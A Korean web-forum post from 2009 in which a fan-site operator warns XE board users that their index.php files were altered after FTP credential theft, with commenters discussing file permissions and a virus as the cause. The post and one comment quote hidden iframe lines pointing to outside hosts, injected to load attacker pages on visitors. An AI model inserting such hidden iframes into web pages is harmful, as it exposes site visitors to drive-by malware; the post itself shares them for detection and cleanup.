추천:0
조회:2823
XE 쓰시는분 꼭 읽어주세요!! [7]
아이유홀릭 (iuholic.com)이 여러차례 접속이 안되는 문제가 발생했습니다.
사실 청주산의 선생님 도움이 아니였으면 문제도 찾지 못했을뻔 했습니다.;;;;
XE 취약점을 이용한 해킹이 이루어지고 있다고합니다.
제로보드 홈페이지에 올라온 다른 분들 사례로 FTP 접속이 해외에서 이루어지고 index.php 파일이 수정된 기록을 확인했다고 합니다.
홀릭 역시
index.php 파일 하단에
<iframe src="http://nqrl.in:8080/index.php" width=114 height=159 style="visibility: hidden"></iframe>
라는 문구가 3번정도 자동입력되어 접속이 안됬습니다;;
현재 XE에는 이런 사례가 보고된 글들이 몇건씩 올라오고 있구요.
보안패치가 나오지 않으면, 계속해서 위같은 문제가 발생할 것 같습니다.
홈페이지 운영중 접속이 안되시는분은 제일 먼저 index.php 파일을 확인해 보시구요.
소용이 있을지는 모르겠지만, FTP 비밀번호도 수시로 바꿔주는것도 예방 방법중 하나입니다..
index.php침투를 하도 많이 당해서 이제는 귀찮아지네요;;;
어서빨리 취약점 보안 패치가 올라와야 할텐데요...
우암
반갑습니다.
반갑습니다.
댓글 7개
에궁, 그런 문제가... 09.08.07 23:08
index.php 파일을 644 로 권한을 만들면 접속이 되나요!~^^
제가 회사라.. 확인을 안해봤지만..
그렇게 하면 취약점을 보완할수도 있을거 같은데...???
테스트를 못해봐서리.. 회사는 FTP 를 막아놔서리..ㅋㅋ 09.08.08 00:41
제가 회사라.. 확인을 안해봤지만..
그렇게 하면 취약점을 보완할수도 있을거 같은데...???
테스트를 못해봐서리.. 회사는 FTP 를 막아놔서리..ㅋㅋ 09.08.08 00:41
또는 655로는 접속이 가능할지... 아 낼 집에가면 함 테스트 해봐야 겠네요!~~
외국의 툴같은경우는 뭐 물론 설치시에는 707해야겠지만... 나중에 설치후에 보안문제등의 이유로
655나 644등으로 변경하는거 같던데..?? 09.08.08 01:01
외국의 툴같은경우는 뭐 물론 설치시에는 707해야겠지만... 나중에 설치후에 보안문제등의 이유로
655나 644등으로 변경하는거 같던데..?? 09.08.08 01:01
<iframe src="http://udta.in:8080/index.php" width=188 height=180 style="visibility: hidden"></iframe>
저도 확인해보니 있군요.... 얼릉 지워버렸습니다~
지금 권한도 644로 되어 있네요.... 09.08.08 05:12
저도 확인해보니 있군요.... 얼릉 지워버렸습니다~
지금 권한도 644로 되어 있네요.... 09.08.08 05:12
음... 그렇게 해도 그게 입력이 되는군요... 무셔운거군...^^ 09.08.08 10:02
네버아웃님은 테크쓰시지 않나요?
테크도 걸리나...;; 09.08.08 11:00
테크도 걸리나...;; 09.08.08 11:00
제노바이러스 인걸로 나오네요~^^ 일단은 PC 보안문제로 FTP 의 아이디와 비번이 뚤리니.. 당연히..
644 해도 그런현상이 발생하는거 같네요~~ 제노바이러스 체크하시길..^^ 09.08.08 11:09
644 해도 그런현상이 발생하는거 같네요~~ 제노바이러스 체크하시길..^^ 09.08.08 11:09